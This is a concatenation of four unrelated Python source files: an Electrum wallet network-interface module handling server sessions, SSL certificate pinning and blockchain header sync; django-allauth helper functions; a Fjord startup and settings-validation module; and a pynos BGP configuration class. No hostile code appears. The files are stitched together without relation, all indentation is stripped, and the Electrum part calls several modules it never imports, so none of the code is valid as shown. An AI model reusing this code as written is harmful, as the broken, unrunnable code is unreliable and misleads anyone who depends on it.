from typing import Tuple, Union, List, TYPE_CHECKING, Optional
from collections import defaultdict
from ipaddress import IPv4Network, IPv6Network, ip_address
import itertools
import logging
import aiorpcx
from aiorpcx import RPCSession, Notification, NetAddress
from aiorpcx.curio import timeout_after, TaskTimeout
from aiorpcx.jsonrpc import JSONRPC, CodeMessageError
from aiorpcx.rawsocket import RSClient
import certifi
from .util import ignore_exceptions, log_exceptions, bfh, SilentTaskGroup
from . import util
from . import x509
from . import pem
from . import version
from . import blockchain
from .blockchain import Blockchain
from . import constants
from .i18n import _
from .logging import Logger
if TYPE_CHECKING:
from .network import Network
ca_path = certifi.where()
BUCKET_NAME_OF_ONION_SERVERS = 'onion'
class NetworkTimeout:
# seconds
class Generic:
NORMAL = 30
RELAXED = 45
MOST_RELAXED = 180
class Urgent(Generic):
NORMAL = 10
RELAXED = 20
MOST_RELAXED = 60
class NotificationSession(RPCSession):
def __init__(self, *args, **kwargs):
super(NotificationSession, self).__init__(*args, **kwargs)
self.subscriptions = defaultdict(list)
self.cache = {}
self.default_timeout = NetworkTimeout.Generic.NORMAL
self._msg_counter = itertools.count(start=1)
self.interface = None # type: Optional[Interface]
self.cost_hard_limit = 0 # disable aiorpcx resource limits
async def handle_request(self, request):
self.maybe_log(f"--> {request}")
try:
if isinstance(request, Notification):
params, result = request.args[:-1], request.args[-1]
key = self.get_hashable_key_for_rpc_call(request.method, params)
if key in self.subscriptions:
self.cache[key] = result
for queue in self.subscriptions[key]:
await queue.put(request.args)
else:
raise Exception(f'unexpected notification')
else:
raise Exception(f'unexpected request. not a notification')
except Exception as e:
self.interface.logger.info(f"error handling request {request}. exc: {repr(e)}")
await self.close()
async def send_request(self, *args, timeout=None, **kwargs):
# note: semaphores/timeouts/backpressure etc are handled by
# aiorpcx. the timeout arg here in most cases should not be set
msg_id = next(self._msg_counter)
self.maybe_log(f"<-- {args} {kwargs} (id: {msg_id})")
try:
# note: RPCSession.send_request raises TaskTimeout in case of a timeout.
# TaskTimeout is a subclass of CancelledError, which is *suppressed* in TaskGroups
response = await asyncio.wait_for(
super().send_request(*args, **kwargs),
timeout)
except (TaskTimeout, asyncio.TimeoutError) as e:
raise RequestTimedOut(f'request timed out: {args} (id: {msg_id})') from e
except CodeMessageError as e:
self.maybe_log(f"--> {repr(e)} (id: {msg_id})")
raise
else:
self.maybe_log(f"--> {response} (id: {msg_id})")
return response
def set_default_timeout(self, timeout):
self.sent_request_timeout = timeout
self.max_send_delay = timeout
async def subscribe(self, method: str, params: List, queue: asyncio.Queue):
# note: until the cache is written for the first time,
# each 'subscribe' call might make a request on the network.
key = self.get_hashable_key_for_rpc_call(method, params)
self.subscriptions[key].append(queue)
if key in self.cache:
result = self.cache[key]
else:
result = await self.send_request(method, params)
self.cache[key] = result
await queue.put(params + [result])
def unsubscribe(self, queue):
"""Unsubscribe a callback to free object references to enable GC."""
# note: we can't unsubscribe from the server, so we keep receiving
# subsequent notifications
for v in self.subscriptions.values():
if queue in v:
v.remove(queue)
@classmethod
def get_hashable_key_for_rpc_call(cls, method, params):
"""Hashable index for subscriptions and cache"""
return str(method) + repr(params)
def maybe_log(self, msg: str) -> None:
if not self.interface: return
if self.interface.debug or self.interface.network.debug:
self.interface.logger.debug(msg)
class GracefulDisconnect(Exception):
log_level = logging.INFO
def __init__(self, *args, log_level=None, **kwargs):
Exception.__init__(self, *args, **kwargs)
if log_level is not None:
self.log_level = log_level
class RequestTimedOut(GracefulDisconnect):
def __str__(self):
return _("Network request timed out.")
class ErrorParsingSSLCert(Exception): pass
class ErrorGettingSSLCertFromServer(Exception): pass
class ConnectError(Exception): pass
class _RSClient(RSClient):
async def create_connection(self):
try:
return await super().create_connection()
except OSError as e:
# note: using "from e" here will set __cause__ of ConnectError
raise ConnectError(e) from e
def deserialize_server(server_str: str) -> Tuple[str, str, str]:
# host might be IPv6 address, hence do rsplit:
host, port, protocol = str(server_str).rsplit(':', 2)
if not host:
raise ValueError('host must not be empty')
if protocol not in ('s', 't'):
raise ValueError('invalid network protocol: {}'.format(protocol))
int(port) # Throw if cannot be converted to int
if not (0 < int(port) < 2**16):
raise ValueError('port {} is out of valid range'.format(port))
return host, port, protocol
def serialize_server(host: str, port: Union[str, int], protocol: str) -> str:
return str(':'.join([host, str(port), protocol]))
class Interface(Logger):
LOGGING_SHORTCUT = 'i'
def __init__(self, network: 'Network', server: str, proxy: Optional[dict]):
self.ready = asyncio.Future()
self.got_disconnected = asyncio.Future()
self.server = server
self.host, self.port, self.protocol = deserialize_server(self.server)
self.port = int(self.port)
Logger.__init__(self)
assert network.config.path
self.cert_path = os.path.join(network.config.path, 'certs', self.host)
self.blockchain = None
self._requested_chunks = set()
self.network = network
self._set_proxy(proxy)
self.session = None # type: NotificationSession
self._ipaddr_bucket = None
self.tip_header = None
self.tip = 0
# Dump network messages (only for this interface). Set at runtime from the console.
self.debug = False
asyncio.run_coroutine_threadsafe(
self.network.main_taskgroup.spawn(self.run()), self.network.asyncio_loop)
self.group = SilentTaskGroup()
def diagnostic_name(self):
return f"{self.host}:{self.port}"
def _set_proxy(self, proxy: dict):
if proxy:
username, pw = proxy.get('user'), proxy.get('password')
if not username or not pw:
auth = None
else:
auth = aiorpcx.socks.SOCKSUserAuth(username, pw)
addr = NetAddress(proxy['host'], proxy['port'])
if proxy['mode'] == "socks4":
self.proxy = aiorpcx.socks.SOCKSProxy(addr, aiorpcx.socks.SOCKS4a, auth)
elif proxy['mode'] == "socks5":
self.proxy = aiorpcx.socks.SOCKSProxy(addr, aiorpcx.socks.SOCKS5, auth)
else:
raise NotImplementedError # http proxy not available with aiorpcx
else:
self.proxy = None
async def is_server_ca_signed(self, ca_ssl_context):
"""Given a CA enforcing SSL context, returns True if the connection
can be established. Returns False if the server has a self-signed
certificate but otherwise is okay. Any other failures raise.
"""
try:
await self.open_session(ca_ssl_context, exit_early=True)
except ConnectError as e:
cause = e.__cause__
if isinstance(cause, ssl.SSLError) and cause.reason == 'CERTIFICATE_VERIFY_FAILED':
# failures due to self-signed certs are normal
return False
raise
return True
async def _try_saving_ssl_cert_for_first_time(self, ca_ssl_context):
ca_signed = await self.is_server_ca_signed(ca_ssl_context)
if ca_signed:
with open(self.cert_path, 'w') as f:
# empty file means this is CA signed, not self-signed
f.write('')
else:
await self.save_certificate()
def _is_saved_ssl_cert_available(self):
if not os.path.exists(self.cert_path):
return False
with open(self.cert_path, 'r') as f:
contents = f.read()
if contents == '': # CA signed
return True
# pinned self-signed cert
try:
b = pem.dePem(contents, 'CERTIFICATE')
except SyntaxError as e:
self.logger.info(f"error parsing already saved cert: {e}")
raise ErrorParsingSSLCert(e) from e
try:
x = x509.X509(b)
except Exception as e:
self.logger.info(f"error parsing already saved cert: {e}")
raise ErrorParsingSSLCert(e) from e
try:
x.check_date()
return True
except x509.CertificateError as e:
self.logger.info(f"certificate has expired: {e}")
os.unlink(self.cert_path) # delete pinned cert only in this case
return False
async def _get_ssl_context(self):
if self.protocol != 's':
# using plaintext TCP
return None
# see if we already have cert for this server; or get it for the first time
ca_sslc = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH, cafile=ca_path)
if not self._is_saved_ssl_cert_available():
try:
await self._try_saving_ssl_cert_for_first_time(ca_sslc)
except (OSError, ConnectError, aiorpcx.socks.SOCKSError) as e:
raise ErrorGettingSSLCertFromServer(e) from e
# now we have a file saved in our certificate store
siz = os.stat(self.cert_path).st_size
if siz == 0:
# CA signed cert
sslc = ca_sslc
else:
# pinned self-signed cert
sslc = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=self.cert_path)
sslc.check_hostname = 0
return sslc
def handle_disconnect(func):
async def wrapper_func(self: 'Interface', *args, **kwargs):
try:
return await func(self, *args, **kwargs)
except GracefulDisconnect as e:
self.logger.log(e.log_level, f"disconnecting due to {repr(e)}")
except aiorpcx.jsonrpc.RPCError as e:
self.logger.warning(f"disconnecting due to {repr(e)}")
self.logger.debug(f"(disconnect) trace for {repr(e)}", exc_info=True)
finally:
await self.network.connection_down(self)
if not self.got_disconnected.done():
self.got_disconnected.set_result(1)
# if was not 'ready' yet, schedule waiting coroutines:
self.ready.cancel()
return wrapper_func
@ignore_exceptions # do not kill main_taskgroup
@log_exceptions
@handle_disconnect
async def run(self):
try:
ssl_context = await self._get_ssl_context()
except (ErrorParsingSSLCert, ErrorGettingSSLCertFromServer) as e:
self.logger.info(f'disconnecting due to: {repr(e)}')
return
try:
await self.open_session(ssl_context)
except (asyncio.CancelledError, ConnectError, aiorpcx.socks.SOCKSError) as e:
self.logger.info(f'disconnecting due to: {repr(e)}')
return
def mark_ready(self):
if self.ready.cancelled():
raise GracefulDisconnect('conn establishment was too slow; *ready* future was cancelled')
if self.ready.done():
return
assert self.tip_header
chain = blockchain.check_header(self.tip_header)
if not chain:
self.blockchain = blockchain.get_best_chain()
else:
self.blockchain = chain
assert self.blockchain is not None
self.logger.info(f"set blockchain with height {self.blockchain.height()}")
self.ready.set_result(1)
async def save_certificate(self):
if not os.path.exists(self.cert_path):
# we may need to retry this a few times, in case the handshake hasn't completed
for _ in range(10):
dercert = await self.get_certificate()
if dercert:
self.logger.info("succeeded in getting cert")
with open(self.cert_path, 'w') as f:
cert = ssl.DER_cert_to_PEM_cert(dercert)
# workaround android bug
cert = re.sub("([^\n])-----END CERTIFICATE-----","\\1\n-----END CERTIFICATE-----",cert)
f.write(cert)
# even though close flushes we can't fsync when closed.
# and we must flush before fsyncing, cause flush flushes to OS buffer
# fsync writes to OS buffer to disk
f.flush()
os.fsync(f.fileno())
break
await asyncio.sleep(1)
else:
raise GracefulDisconnect("could not get certificate after 10 tries")
async def get_certificate(self):
sslc = ssl.SSLContext()
try:
async with _RSClient(session_factory=RPCSession,
host=self.host, port=self.port,
ssl=sslc, proxy=self.proxy) as session:
return session.transport._asyncio_transport._ssl_protocol._sslpipe._sslobj.getpeercert(True)
except ValueError:
return None
async def get_block_header(self, height, assert_mode):
self.logger.info(f'requesting block header {height} in mode {assert_mode}')
# use lower timeout as we usually have network.bhi_lock here
timeout = self.network.get_network_timeout_seconds(NetworkTimeout.Urgent)
res = await self.session.send_request('blockchain.block.header', [height], timeout=timeout)
return blockchain.deserialize_header(bytes.fromhex(res), height)
async def request_chunk(self, height, tip=None, *, can_return_early=False):
index = height // 2016
if can_return_early and index in self._requested_chunks:
return
self.logger.info(f"requesting chunk from height {height}")
size = 2016
if tip is not None:
size = min(size, tip - index * 2016 + 1)
size = max(size, 0)
try:
self._requested_chunks.add(index)
res = await self.session.send_request('blockchain.block.headers', [index * 2016, size])
finally:
try: self._requested_chunks.remove(index)
except KeyError: pass
conn = self.blockchain.connect_chunk(index, res['hex'])
if not conn:
return conn, 0
return conn, res['count']
def is_main_server(self) -> bool:
return self.network.default_server == self.server
async def open_session(self, sslc, exit_early=False):
async with _RSClient(session_factory=NotificationSession,
host=self.host, port=self.port,
ssl=sslc, proxy=self.proxy) as session:
self.session = session # type: NotificationSession
self.session.interface = self
self.session.set_default_timeout(self.network.get_network_timeout_seconds(NetworkTimeout.Generic))
try:
ver = await session.send_request('server.version', [self.client_name(), version.PROTOCOL_VERSION])
except aiorpcx.jsonrpc.RPCError as e:
raise GracefulDisconnect(e) # probably 'unsupported protocol version'
if exit_early:
return
if not self.network.check_interface_against_healthy_spread_of_connected_servers(self):
raise GracefulDisconnect(f'too many connected servers already '
f'in bucket {self.bucket_based_on_ipaddress()}')
self.logger.info(f"connection established. version: {ver}")
try:
async with self.group as group:
await group.spawn(self.ping)
await group.spawn(self.run_fetch_blocks)
await group.spawn(self.monitor_connection)
except aiorpcx.jsonrpc.RPCError as e:
if e.code in (JSONRPC.EXCESSIVE_RESOURCE_USAGE,
JSONRPC.SERVER_BUSY,
JSONRPC.METHOD_NOT_FOUND):
raise GracefulDisconnect(e, log_level=logging.WARNING) from e
raise
async def monitor_connection(self):
while True:
await asyncio.sleep(1)
if not self.session or self.session.is_closing():
raise GracefulDisconnect('session was closed')
async def ping(self):
while True:
await asyncio.sleep(300)
await self.session.send_request('server.ping')
async def close(self):
if self.session:
await self.session.close()
# monitor_connection will cancel tasks
async def run_fetch_blocks(self):
header_queue = asyncio.Queue()
await self.session.subscribe('blockchain.headers.subscribe', [], header_queue)
while True:
item = await header_queue.get()
raw_header = item[0]
height = raw_header['height']
header = blockchain.deserialize_header(bfh(raw_header['hex']), height)
self.tip_header = header
self.tip = height
if self.tip < constants.net.max_checkpoint():
raise GracefulDisconnect('server tip below max checkpoint')
self.mark_ready()
await self._process_header_at_tip()
self.network.trigger_callback('network_updated')
await self.network.switch_unwanted_fork_interface()
await self.network.switch_lagging_interface()
async def _process_header_at_tip(self):
height, header = self.tip, self.tip_header
async with self.network.bhi_lock:
if self.blockchain.height() >= height and self.blockchain.check_header(header):
# another interface amended the blockchain
self.logger.info(f"skipping header {height}")
return
_, height = await self.step(height, header)
# in the simple case, height == self.tip+1
if height <= self.tip:
await self.sync_until(height)
self.network.trigger_callback('blockchain_updated')
async def sync_until(self, height, next_height=None):
if next_height is None:
next_height = self.tip
last = None
while last is None or height <= next_height:
prev_last, prev_height = last, height
if next_height > height + 10:
could_connect, num_headers = await self.request_chunk(height, next_height)
if not could_connect:
if height <= constants.net.max_checkpoint():
raise GracefulDisconnect('server chain conflicts with checkpoints or genesis')
last, height = await self.step(height)
continue
self.network.trigger_callback('network_updated')
height = (height // 2016 * 2016) + num_headers
assert height <= next_height+1, (height, self.tip)
last = 'catchup'
else:
last, height = await self.step(height)
assert (prev_last, prev_height) != (last, height), 'had to prevent infinite loop in interface.sync_until'
return last, height
async def step(self, height, header=None):
assert 0 <= height <= self.tip, (height, self.tip)
if header is None:
header = await self.get_block_header(height, 'catchup')
chain = blockchain.check_header(header) if 'mock' not in header else header['mock']['check'](header)
if chain:
self.blockchain = chain if isinstance(chain, Blockchain) else self.blockchain
# note: there is an edge case here that is not handled.
# we might know the blockhash (enough for check_header) but
# not have the header itself. e.g. regtest chain with only genesis.
# this situation resolves itself on the next block
return 'catchup', height+1
can_connect = blockchain.can_connect(header) if 'mock' not in header else header['mock']['connect'](height)
if not can_connect:
self.logger.info(f"can't connect {height}")
height, header, bad, bad_header = await self._search_headers_backwards(height, header)
chain = blockchain.check_header(header) if 'mock' not in header else header['mock']['check'](header)
can_connect = blockchain.can_connect(header) if 'mock' not in header else header['mock']['connect'](height)
assert chain or can_connect
if can_connect:
self.logger.info(f"could connect {height}")
height += 1
if isinstance(can_connect, Blockchain): # not when mocking
self.blockchain = can_connect
self.blockchain.save_header(header)
return 'catchup', height
good, bad, bad_header = await self._search_headers_binary(height, bad, bad_header, chain)
return await self._resolve_potential_chain_fork_given_forkpoint(good, bad, bad_header)
async def _search_headers_binary(self, height, bad, bad_header, chain):
assert bad == bad_header['block_height']
_assert_header_does_not_check_against_any_chain(bad_header)
self.blockchain = chain if isinstance(chain, Blockchain) else self.blockchain
good = height
while True:
assert good < bad, (good, bad)
height = (good + bad) // 2
self.logger.info(f"binary step. good {good}, bad {bad}, height {height}")
header = await self.get_block_header(height, 'binary')
chain = blockchain.check_header(header) if 'mock' not in header else header['mock']['check'](header)
if chain:
self.blockchain = chain if isinstance(chain, Blockchain) else self.blockchain
good = height
else:
bad = height
bad_header = header
if good + 1 == bad:
break
mock = 'mock' in bad_header and bad_header['mock']['connect'](height)
real = not mock and self.blockchain.can_connect(bad_header, check_height=False)
if not real and not mock:
raise Exception('unexpected bad header during binary: {}'.format(bad_header))
_assert_header_does_not_check_against_any_chain(bad_header)
self.logger.info(f"binary search exited. good {good}, bad {bad}")
return good, bad, bad_header
async def _resolve_potential_chain_fork_given_forkpoint(self, good, bad, bad_header):
assert good + 1 == bad
assert bad == bad_header['block_height']
_assert_header_does_not_check_against_any_chain(bad_header)
# 'good' is the height of a block 'good_header', somewhere in self.blockchain.
# bad_header connects to good_header; bad_header itself is NOT in self.blockchain.
bh = self.blockchain.height()
assert bh >= good, (bh, good)
if bh == good:
height = good + 1
self.logger.info(f"catching up from {height}")
return 'no_fork', height
# this is a new fork we don't yet have
height = bad + 1
self.logger.info(f"new fork at bad height {bad}")
forkfun = self.blockchain.fork if 'mock' not in bad_header else bad_header['mock']['fork']
b = forkfun(bad_header) # type: Blockchain
self.blockchain = b
assert b.forkpoint == bad
return 'fork', height
async def _search_headers_backwards(self, height, header):
async def iterate():
nonlocal height, header
checkp = False
if height <= constants.net.max_checkpoint():
height = constants.net.max_checkpoint()
checkp = True
header = await self.get_block_header(height, 'backward')
chain = blockchain.check_header(header) if 'mock' not in header else header['mock']['check'](header)
can_connect = blockchain.can_connect(header) if 'mock' not in header else header['mock']['connect'](height)
if chain or can_connect:
return False
if checkp:
raise GracefulDisconnect("server chain conflicts with checkpoints")
return True
bad, bad_header = height, header
_assert_header_does_not_check_against_any_chain(bad_header)
with blockchain.blockchains_lock: chains = list(blockchain.blockchains.values())
local_max = max([0] + [x.height() for x in chains]) if 'mock' not in header else float('inf')
height = min(local_max + 1, height - 1)
while await iterate():
bad, bad_header = height, header
delta = self.tip - height
height = self.tip - 2 * delta
_assert_header_does_not_check_against_any_chain(bad_header)
self.logger.info(f"exiting backward mode at {height}")
return height, header, bad, bad_header
@classmethod
def client_name(cls) -> str:
return f'electrum/{version.ELECTRUM_VERSION}'
def is_tor(self):
return self.host.endswith('.onion')
def ip_addr(self) -> Optional[str]:
session = self.session
if not session: return None
peer_addr = session.remote_address()
if not peer_addr: return None
return str(peer_addr.host)
def bucket_based_on_ipaddress(self) -> str:
def do_bucket():
if self.is_tor():
return BUCKET_NAME_OF_ONION_SERVERS
try:
ip_addr = ip_address(self.ip_addr())
except ValueError:
return ''
if not ip_addr:
return ''
if ip_addr.version == 4:
slash16 = IPv4Network(ip_addr).supernet(prefixlen_diff=32-16)
return str(slash16)
elif ip_addr.version == 6:
slash48 = IPv6Network(ip_addr).supernet(prefixlen_diff=128-48)
return str(slash48)
return ''
if not self._ipaddr_bucket:
self._ipaddr_bucket = do_bucket()
return self._ipaddr_bucket
def _assert_header_does_not_check_against_any_chain(header: dict) -> None:
chain_bad = blockchain.check_header(header) if 'mock' not in header else header['mock']['check'](header)
if chain_bad:
raise Exception('bad_header must not check!')
def check_cert(host, cert):
try:
b = pem.dePem(cert, 'CERTIFICATE')
x = x509.X509(b)
except:
traceback.print_exc(file=sys.stdout)
return
try:
x.check_date()
expired = False
except:
expired = True
m = "host: %s\n"%host
m += "has_expired: %s\n"% expired
util.print_msg(m)
# Used by tests
def _match_hostname(name, val):
if val == name:
return True
return val.startswith('*.') and name.endswith(val[1:])
def test_certificates():
from .simple_config import SimpleConfig
config = SimpleConfig()
mydir = os.path.join(config.path, "certs")
certs = os.listdir(mydir)
for c in certs:
p = os.path.join(mydir,c)
with open(p, encoding='utf-8') as f:
cert = f.read()
check_cert(c, cert)
if __name__ == "__main__":
test_certificates()
|
|
import re
import unicodedata
import json
from django.core.exceptions import ImproperlyConfigured
from django.core.validators import validate_email, ValidationError
from django.core import urlresolvers
from django.db.models import FieldDoesNotExist
from django.db.models.fields import (DateTimeField, DateField,
EmailField, TimeField)
from django.utils import six, dateparse
from django.utils.datastructures import SortedDict
from django.core.serializers.json import DjangoJSONEncoder
try:
from django.utils.encoding import force_text
except ImportError:
from django.utils.encoding import force_unicode as force_text
try:
import importlib
except:
from django.utils import importlib
def _generate_unique_username_base(txts):
username = None
for txt in txts:
if not txt:
continue
username = unicodedata.normalize('NFKD', force_text(txt))
username = username.encode('ascii', 'ignore').decode('ascii')
username = force_text(re.sub('[^\w\s@+.-]', '', username).lower())
# Django allows for '@' in usernames in order to accomodate for
# project wanting to use e-mail for username. In allauth we don't
# use this, we already have a proper place for putting e-mail
# addresses (EmailAddress), so let's not use the full e-mail
# address and only take the part leading up to the '@'.
username = username.split('@')[0]
username = username.strip()
username = re.sub('\s+', '_', username)
if username:
break
return username or 'user'
def generate_unique_username(txts):
from .account.app_settings import USER_MODEL_USERNAME_FIELD
username = _generate_unique_username_base(txts)
User = get_user_model()
try:
max_length = User._meta.get_field(USER_MODEL_USERNAME_FIELD).max_length
except FieldDoesNotExist:
raise ImproperlyConfigured(
"USER_MODEL_USERNAME_FIELD does not exist in user-model"
)
i = 0
while True:
try:
if i:
pfx = str(i + 1)
else:
pfx = ''
ret = username[0:max_length - len(pfx)] + pfx
query = {USER_MODEL_USERNAME_FIELD + '__iexact': ret}
User.objects.get(**query)
i += 1
except User.DoesNotExist:
return ret
def valid_email_or_none(email):
ret = None
try:
if email:
validate_email(email)
if len(email) <= EmailField().max_length:
ret = email
except ValidationError:
pass
return ret
def email_address_exists(email, exclude_user=None):
from .account import app_settings as account_settings
from .account.models import EmailAddress
emailaddresses = EmailAddress.objects
if exclude_user:
emailaddresses = emailaddresses.exclude(user=exclude_user)
ret = emailaddresses.filter(email__iexact=email).exists()
if not ret:
email_field = account_settings.USER_MODEL_EMAIL_FIELD
if email_field:
users = get_user_model().objects
if exclude_user:
users = users.exclude(pk=exclude_user.pk)
ret = users.filter(**{email_field+'__iexact': email}).exists()
return ret
def import_attribute(path):
assert isinstance(path, six.string_types)
pkg, attr = path.rsplit('.', 1)
ret = getattr(importlib.import_module(pkg), attr)
return ret
def import_callable(path_or_callable):
if not hasattr(path_or_callable, '__call__'):
ret = import_attribute(path_or_callable)
else:
ret = path_or_callable
return ret
try:
from django.contrib.auth import get_user_model
except ImportError:
# To keep compatibility with Django 1.4
def get_user_model():
from . import app_settings
from django.db.models import get_model
try:
app_label, model_name = app_settings.USER_MODEL.split('.')
except ValueError:
raise ImproperlyConfigured("AUTH_USER_MODEL must be of the"
" form 'app_label.model_name'")
user_model = get_model(app_label, model_name)
if user_model is None:
raise ImproperlyConfigured("AUTH_USER_MODEL refers to model"
" '%s' that has not been installed"
% app_settings.USER_MODEL)
return user_model
def resolve_url(to):
"""
Subset of django.shortcuts.resolve_url (that one is 1.5+)
"""
try:
return urlresolvers.reverse(to)
except urlresolvers.NoReverseMatch:
# If this doesn't "feel" like a URL, re-raise.
if '/' not in to and '.' not in to:
raise
# Finally, fall back and assume it's a URL
return to
def serialize_instance(instance):
"""
Since Django 1.6 items added to the session are no longer pickled,
but JSON encoded by default. We are storing partially complete models
in the session (user, account, token, ...). We cannot use standard
Django serialization, as these are models are not "complete" yet.
Serialization will start complaining about missing relations et al.
"""
ret = dict([(k, v)
for k, v in instance.__dict__.items()
if not k.startswith('_')])
return json.loads(json.dumps(ret, cls=DjangoJSONEncoder))
def deserialize_instance(model, data):
ret = model()
for k, v in data.items():
if v is not None:
try:
f = model._meta.get_field(k)
if isinstance(f, DateTimeField):
v = dateparse.parse_datetime(v)
elif isinstance(f, TimeField):
v = dateparse.parse_time(v)
elif isinstance(f, DateField):
v = dateparse.parse_date(v)
except FieldDoesNotExist:
pass
setattr(ret, k, v)
return ret
def set_form_field_order(form, fields_order):
if isinstance(form.fields, SortedDict):
form.fields.keyOrder = fields_order
else:
# Python 2.7+
from collections import OrderedDict
assert isinstance(form.fields, OrderedDict)
form.fields = OrderedDict((f, form.fields[f])
for f in fields_order)
def build_absolute_uri(request, location, protocol=None):
uri = request.build_absolute_uri(location)
if protocol:
uri = protocol + ':' + uri.partition(':')[2]
return uri
def get_form_class(forms, form_id, default_form):
form_class = forms.get(form_id, default_form)
if isinstance(form_class, six.string_types):
form_class = import_attribute(form_class)
return form_class
|
|
"""This module holds all the functions that deal with starting up
Fjord for both the developer and server environments.
These functions shouldn't be used after startup is completed.
"""
import logging
import os
import sys
from itertools import chain
from fjord import path
log = logging.getLogger(__name__)
# Denotes that setup_environ has been run.
_has_setup_environ = False
# Prevent from patching twice.
_has_patched = False
# Taken from peep
class EmptyOptions(object):
"""Fake optparse options for compatibility with pip<1.2
pip<1.2 had a bug in parse_requirments() in which the ``options``
kwarg was required. We work around that by passing it a mock
object.
"""
default_vcs = None
skip_requirements_regex = None
isolated_mode = False
def check_dependencies():
"""Check installed requirements vs. specified requirements
This prints out a list of dependencies where the version installed
is not the same as the one specified in the requirements files.
It also exits immediately. At some point we might want to change
it from doing that, but not today.
If you want to skip this check, set SKIP_CHECK=1 in your
environment.
.. Note::
This only works for packaged requirements. It does not work for
requirements downloaded in a tarball from github. Those
requirements get put in the "unsatisfyable" requirements list
and this will tell you how many there are.
Generally we should minimize those requirements as much as
possible.
"""
# Import this here because not all environments have pip.
from pip.req import parse_requirements
from pip.download import PipSession
req_path = path('requirements')
req_files = [os.path.join(req_path, fn) for fn in os.listdir(req_path)]
reqs = list(chain(*(parse_requirements(path,
options=EmptyOptions(),
session=PipSession())
for path in req_files)))
unsatisfied_reqs = []
unsatisfyable_reqs = []
for req in reqs:
if req.link and req.url and 'github.com' in req.url:
unsatisfyable_reqs.append(req)
continue
req.check_if_exists()
if not req.satisfied_by:
unsatisfied_reqs.append(req)
if unsatisfyable_reqs:
print 'There are %d requirements that cannot be checked.' % (
len(unsatisfyable_reqs))
if unsatisfied_reqs:
print 'The following requirements are not satsifed:'
print ''
for req in unsatisfied_reqs:
print 'UNSATISFIED:', req.req
print ''
print 'Update your virtual environment by doing:'
print ''
print ' ./peep.sh install -r requirements/requirements.txt'
print ' ./peep.sh install -r requirements/compiled.txt'
print ' ./peep.sh install -r requirements/dev.txt'
print ''
print 'or run with SKIP_CHECK=1 .'
sys.exit(1)
def setup_environ():
"""Sets up the Django environment
1. validates settings
2. sets up django-celery
"""
global _has_setup_environ
if _has_setup_environ:
return
from django.conf import settings
validate_settings(settings)
_has_setup_environ = True
def validate_settings(settings):
"""Raise an error if we see insecure or missing settings"""
from django.core.exceptions import ImproperlyConfigured
if not settings.DATABASES['default']:
msg = 'DATABASES["default"] needs to be set.'
raise ImproperlyConfigured(msg)
if not getattr(settings, 'SECRET_KEY', None):
msg = 'settings.SECRET_KEY needs to be set.'
raise ImproperlyConfigured(msg)
if not settings.DEBUG:
if not getattr(settings, 'SECRET_KEY', 'notsecret'):
msg = 'settings.SECRET_KEY is set to "notsecret". please change.'
raise ImproperlyConfigured(msg)
if getattr(settings, 'SESSION_COOKIE_SECURE', None) is None:
msg = (
'settings.SESSION_COOKIE_SECURE should be set to True; '
'otherwise, your session ids can be intercepted over HTTP!'
)
raise ImproperlyConfigured(msg)
hmac = getattr(settings, 'HMAC_KEYS', {})
if not len(hmac.keys()):
msg = 'settings.HMAC_KEYS cannot be empty.'
raise ImproperlyConfigured(msg)
def monkeypatch():
"""All the monkeypatching we have to do to get things running"""
global _has_patched
if _has_patched:
return
# Import for side-effect: configures logging handlers.
from fjord.settings.log_settings import noop
noop()
# Monkey-patch admin site.
from django.contrib import admin
from django.contrib.auth.decorators import login_required
from session_csrf import anonymous_csrf
from adminplus.sites import AdminSitePlus
# Patch the admin
admin.site = AdminSitePlus()
admin.site.login = login_required(anonymous_csrf(admin.site.login))
# Monkey-patch django forms to avoid having to use Jinja2's |safe
# everywhere.
import jingo.monkey
jingo.monkey.patch()
# Monkey-patch Django's csrf_protect decorator to use
# session-based CSRF tokens.
import session_csrf
session_csrf.monkeypatch()
from jingo import load_helpers
load_helpers()
logging.debug('Note: monkeypatches executed in %s' % __file__)
# Prevent it from being run again later.
_has_patched = True
def main(argv=None):
if not _has_setup_environ:
raise EnvironmentError(
'setup_environ() has not been called for this process')
from django.core.management import execute_from_command_line
argv = argv or sys.argv
execute_from_command_line(argv)
|
|
"""
Copyright 2015 Brocade Communications Systems, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from ipaddress import ip_interface
import xml.etree.ElementTree as ET
from pynos.versions.ver_6.ver_6_0_1.yang.brocade_rbridge import brocade_rbridge
import pynos.utilities
from pynos.versions.base.bgp import BGP as BaseBGP
class BGP(BaseBGP):
"""
The BGP class holds all relevent methods and attributes for the BGP
capabilities of the NOS device.
Attributes:
None
"""
def __init__(self, callback):
"""
BGP object init.
Args:
callback: Callback function that will be called for each action.
Returns:
BGP Object
Raises:
None
"""
super(BGP, self).__init__(callback)
self._rbridge = brocade_rbridge(callback=pynos.utilities.return_xml)
def local_asn(self, **kwargs):
"""Set BGP local ASN.
Args:
local_as (str): Local ASN of NOS deice.
rbridge_id (str): The rbridge ID of the device on which BGP will be
configured in a VCS fabric.
get (bool): Get config instead of editing config. (True, False)
callback (function): A function executed upon completion of the
method. The only parameter passed to `callback` will be the
``ElementTree`` `config`.
Returns:
Return value of `callback`.
Raises:
KeyError: if `local_as` is not specified.
Examples:
>>> import pynos.device
>>> conn = ('10.24.39.203', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp.local_asn(local_as='65535',
... rbridge_id='225')
... dev.bgp.local_asn() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
KeyError
"""
is_get_config = kwargs.pop('get', False)
if not is_get_config:
local_as = kwargs.pop('local_as')
else:
local_as = ''
rbridge_id = kwargs.pop('rbridge_id', '1')
callback = kwargs.pop('callback', self._callback)
local_as_args = dict(local_as=local_as,
rbridge_id=rbridge_id)
enable_bgp = getattr(self._rbridge,
'rbridge_id_router_router_bgp_router_bgp_'
'attributes_local_as')(**local_as_args)
bgp = enable_bgp.find('.//*.//*.//*')
bgp.remove(bgp.find('.//*'))
if not is_get_config:
callback(enable_bgp)
local_as = getattr(self._rbridge,
'rbridge_id_router_router_bgp_router_bgp_attri'
'butes_local_as')
config = local_as(**local_as_args)
if is_get_config:
return callback(config, handler='get_config')
return callback(config)
